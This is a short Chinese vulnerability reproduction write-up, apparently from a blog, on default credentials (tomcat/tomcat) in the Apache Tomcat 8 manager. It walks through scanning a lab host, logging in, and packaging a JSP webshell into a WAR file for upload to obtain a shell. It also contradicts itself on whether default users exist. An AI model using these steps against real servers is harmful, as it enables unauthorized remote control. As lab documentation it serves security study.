Apache-Tomcat_8_weak-password
| 说明 | 内容 |
|---|---|
| 漏洞编号 | |
| 漏洞名称 | Apache-Tomcat8 弱口令 |
| 漏洞评级 | 高危 |
| 影响范围 | Apache-Tomcat 7+ |
| 漏洞描述 | 存在默认口令 |
| 修复方案 |
漏洞描述
正常安装的情况下,tomcat8中默认没有任何用户,且manager页面只允许本地IP访问。只有管理员手工修改了某些属性,才可以进行攻击。
漏洞等级
高危
影响版本
- apache-tomcat 7+
漏洞复现
基础环境
| 组件 | 版本 |
|---|---|
| OS | kali-linux |
| Web Server | chrome |
| apache-tomcat | 8 |
漏洞扫描
使用nacs可以扫描到漏洞
sudo ./nacs -h 192.168.117.163 -pa 80

漏洞验证
启动环境,访问主页,使用默认账号密码登录
tomcat
tomcat


深度利用
GetShell
可以将木马做成war包进行上传

-
进入java目录
cd tools/java/jdk1.8.0_65/bin -
将jshell.jsp复制过来
cp /home/kali/tools/webshell/jsp/jshell.jsp ./ -
用jar命令进行压缩
./jar cvf jshell.war jshell.jsp
-
上传war包,会生成路径

-
访问路径即完成getshell
漏洞挖掘
网络测绘
tomcat 8
修复建议
无
本文详细描述了ApacheTomcat8中的一个高危弱口令漏洞,指出默认情况下存在安全风险,可通过特定步骤复现和利用,包括GetShell攻击。建议及时更新或配置安全措施以防止漏洞被利用。
2417

被折叠的 条评论
为什么被折叠?



